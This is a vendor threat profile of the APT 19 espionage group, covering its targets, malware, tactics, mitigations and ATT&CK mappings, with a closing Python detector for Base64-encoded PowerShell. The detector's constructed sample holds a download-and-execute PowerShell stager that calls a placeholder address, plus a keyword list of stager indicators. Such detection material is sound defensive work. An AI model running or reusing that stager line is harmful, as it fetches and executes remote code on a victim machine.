APT 19 | Cyble

Threat Actor Profile: APT 19 

APT 19 is a long-running and highly adaptive threat group, with a wide collection of aliases including Deep Panda, Shell Crew, KungFu Kittens, WebMasters, and PinkPanther. While primarily operating out of China, APT 19’s influence is global, with a particular focus on critical sectors such as defense, energy, finance, pharmaceuticals, telecommunications, and law. 

Their operations blend traditional espionage with cybercrime tactics. They have been linked to major data breaches involving U.S. healthcare giants and are known for deploying highly targeted phishing campaigns and custom malware to exfiltrate sensitive data. 

APT 19 typically initiates attacks via spearphishing emails loaded with malicious attachments, usually in RTF or XLSM formats. Once inside a network, they rely on PowerShell, Windows Management Instrumentation (WMI), and other scripting methods to execute payloads, move laterally, and establish persistence. One of their more notable initial access methods was a watering hole attack on Forbes.com in 2014. 

A common scenario might involve phishing employees at a defense contractor, deploying malware to infiltrate secure systems, extracting classified project data, and transmitting it to offshore servers. That data can then be exploited for espionage or sold on the dark web for financial gain, while the attackers stay hidden behind layers of encryption and stealthy malware. 

Target Regions  

Figure: Cyble Vision Threat Library (Source: Cyble Vision)

While APT 19 operates on a global scale, its activities have consistently shown a strong focus on specific geographic regions. Primary among these are the United States, Australia, and various parts of East Asia. The group’s campaigns often reflect priorities aligned with Chinese national interests, suggesting a hybrid model of cyber operations that blends freelancer-driven efforts with state-sponsored objectives. 

APT 19 has targeted a broad spectrum of industries. Notable target sectors include aerospace and defense, healthcare, government and law enforcement, telecommunications, and technology, all of which are commonly associated with national security and strategic value. 

Beyond those high-stakes areas, APT 19 has also launched campaigns against industries such as pharmaceuticals and biotechnology, education, energy and utilities, manufacturing, and construction. Their reach even extends into commercial sectors like banking, financial services, and insurance (BFSI), media and entertainment, agriculture and livestock, food and beverages, and organizational services. 

Known Malware Families and Toolset 

Figure: Malware Families Used by APT 19 (Source: Cyble Vision)

APT 19 maintains a highly advanced malware arsenal, employing at least nine known malware families designed for espionage, persistence, and stealth. These tools are strategically selected to facilitate lateral movement, command and control (C2), and data exfiltration across various compromised environments. 

Among the most commonly used tools is Cobalt Strike, a legitimate penetration testing suite frequently abused by threat actors for post-exploitation tasks, including lateral movement and C2 communications. APT 19 also utilizes a modified version known as Cobalt Strike Cat, which is popular among Chinese-speaking cybercrime forums and is engineered for enhanced evasion and persistence. 

Other tools in their arsenal include EmpireProject, a backdoor designed for command execution and remote control, and 9002 RAT, a Remote Access Trojan (RAT) typically deployed for surveillance and data theft. The group also uses C0d0so0, a custom backdoor with two known variants: one communicates over HTTP and the other over port 22. This malware compresses and encodes its network traffic to avoid detection and bears similarities to the Derusbi malware, which APT 19 also deploys. Derusbi is notable for its customized builds tailored to individual campaigns, particularly within Chinese cyber-espionage operations.

Additional tools include EvilGrab RAT, which enables webcam access, file theft, and screen capture, and FormerFirstRAT, a remote access tool used to maintain persistence within the victim’s environment. Fire Chili, a stealthy rootkit signed with legitimate digital certificates, is used to bypass detection mechanisms and maintain kernel-level access. Lastly, Poison Ivy, a long-standing remote administration tool, is used for credential harvesting and continuous surveillance. 

Tactics, Techniques, and Procedures (TTPs) 

APT 19 uses a wide range of attack techniques throughout the different stages of a cyberattack. Their methods begin with gaining access through tactics like compromising trusted websites, a method seen in their past attack on Forbes.com, and sending targeted emails containing infected attachments such as Word or Excel files. 

Once inside a network, they execute their attacks using tools like PowerShell and command scripts to run malicious code. They also move laterally within networks by exploiting system tools and getting users to open harmful files. 

To maintain long-term access, APT 19 uses a range of persistence methods. These include placing hidden backdoors (web shells) on web servers, manipulating the way systems load files to inject malicious code, and even exploiting accessibility features such as “sticky keys” to bypass login screens. They also alter system settings so that their malware launches automatically when a device starts.

To evade detection, the group disguises commands and payloads using encoding techniques, decrypts hidden information within its tools, and runs its malware through legitimate-looking software to avoid raising alarms. Its rootkits, such as Fire Chili, allow it to hide deep within systems without being noticed. 

APT 19 is also skilled at gathering information for cyberespionage. Once inside the network, the group enumerates system details and connected machines, collects user data, and maps the processes running on hosts across the network.

When it comes to spreading through a system, they often use shared network folders and stolen credentials to move from one device to another. Finally, they communicate with their command servers using standard web traffic, often hiding their messages in encoded formats to avoid detection. 

Recommendations and Mitigations 

To defend against APT 19’s methods, organizations should:

  • Block spearphishing emails with malicious RTF and Excel attachments using sandboxing and threat filters. 
  • Keep Microsoft Office, Windows, Adobe, and related applications up to date to close known vulnerabilities. 
  • Educate employees to recognize phishing emails, suspicious files, and common social engineering tactics. 
  • Detect and stop lateral movement, script-based execution, and unauthorized persistence mechanisms. 
  • Isolate critical systems and sensitive data to limit an attacker’s ability to move freely inside your network. 
  • Integrate real-time threat feeds and IOCs through platforms like Cyble to identify emerging threats early. 
  • Check for unauthorized registry edits, DLL hijacking, rogue services, or hidden malware like rootkits (e.g., Fire Chili). 

Conclusion 

APT 19 remains a persistent and dangerous cyber-espionage threat, targeting critical sectors with malware. Whether acting independently or with state support, the group continues to challenge global cybersecurity defenses. 

Organizations need more than basic security tools to protect against such threat actors. Cyble offers an integrated platform combining AI-driven threat intelligence, real-time monitoring, and rapid response. From dark web monitoring to vulnerability management and brand protection, Cyble empowers businesses to detect, mitigate, and respond to attacks proactively. 

Stay protected. Schedule a demo with Cyble today. 

MITRE ATT&CK Techniques Associated with APT 19 

Figure: MITRE ATT&CK Techniques (Source: Cyble Vision)

  • Initial Access (TA0001) – Drive-by Compromise (T1189): APT19 conducted a watering hole attack on forbes.com in 2014 to compromise targets. 
  • Spearphishing Attachment (T1566.001): APT19 sent spearphishing emails with malicious RTF and XLSM attachments to deliver initial exploits. 
  • Execution (TA0002) – Malicious File (T1204.002): APT19 attempts to get users to launch malicious attachments via spearphishing emails. 
  • Persistence (TA0003) – Web Shell (T1505.003): Deep Panda used web shells on publicly accessible servers to maintain access. 
  • DLL Search Order Hijacking (T1574.001): APT19 used a legitimate executable to launch HTTP and Port 22 malware variants via DLL hijacking. 
  • Defense Evasion (TA0005) – Command Obfuscation (T1027.010): APT19 used Base64 encoding to obfuscate executed commands. 
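As an added detection example (not code from the original profile or from Cyble), the following Python flags the Base64-encoded PowerShell commands listed under T1027.010 above and the WMI-driven execution described in the TTPs section, decoding the payload so an analyst can see the underlying command. The process-creation events, the stager text and the 203.0.113.10 address are constructed for this example.

```python
"""Detect Base64-encoded PowerShell launchers (ATT&CK T1027.010) in process-creation
telemetry and decode them for analyst review. All events below are constructed."""
import base64
import binascii
import re
from typing import Optional

# PowerShell accepts -EncodedCommand and its unambiguous short forms (-e, -ec, -enc).
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Strings that frequently sit inside decoded download-and-execute stagers.
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "frombase64string", "hidden")


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand carries UTF-16LE text; return it, or None if the blob is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_process_event(event: dict) -> Optional[dict]:
    """Return a finding for one process-creation event, or None when no encoded flag is present."""
    match = ENCODED_FLAG.search(event.get("CommandLine", ""))
    if not match:
        return None
    decoded = decode_encoded_command(match.group(1))
    lowered = (decoded or "").lower()
    indicators = [s for s in SUSPICIOUS if s in lowered]
    if decoded is None:
        indicators.append("undecodable-payload")
    # APT 19 leans on WMI for execution; a WMI provider host as parent is a further clue.
    if event.get("ParentImage", "").lower().endswith("wmiprvse.exe"):
        indicators.append("parent=wmiprvse.exe")
    return {"image": event.get("Image"), "decoded": decoded,
            "indicators": indicators, "severity": "high" if indicators else "medium"}


# Constructed sample: a stager encoded the way PowerShell expects (UTF-16LE, then Base64).
SAMPLE_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.txt')"
SAMPLE_BLOB = base64.b64encode(SAMPLE_STAGER.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "Image": "powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -enc {SAMPLE_BLOB}"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": "powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for finding in filter(None, map(analyze_process_event, SAMPLE_EVENTS)):
        print(finding["severity"], finding["indicators"], finding["decoded"])
```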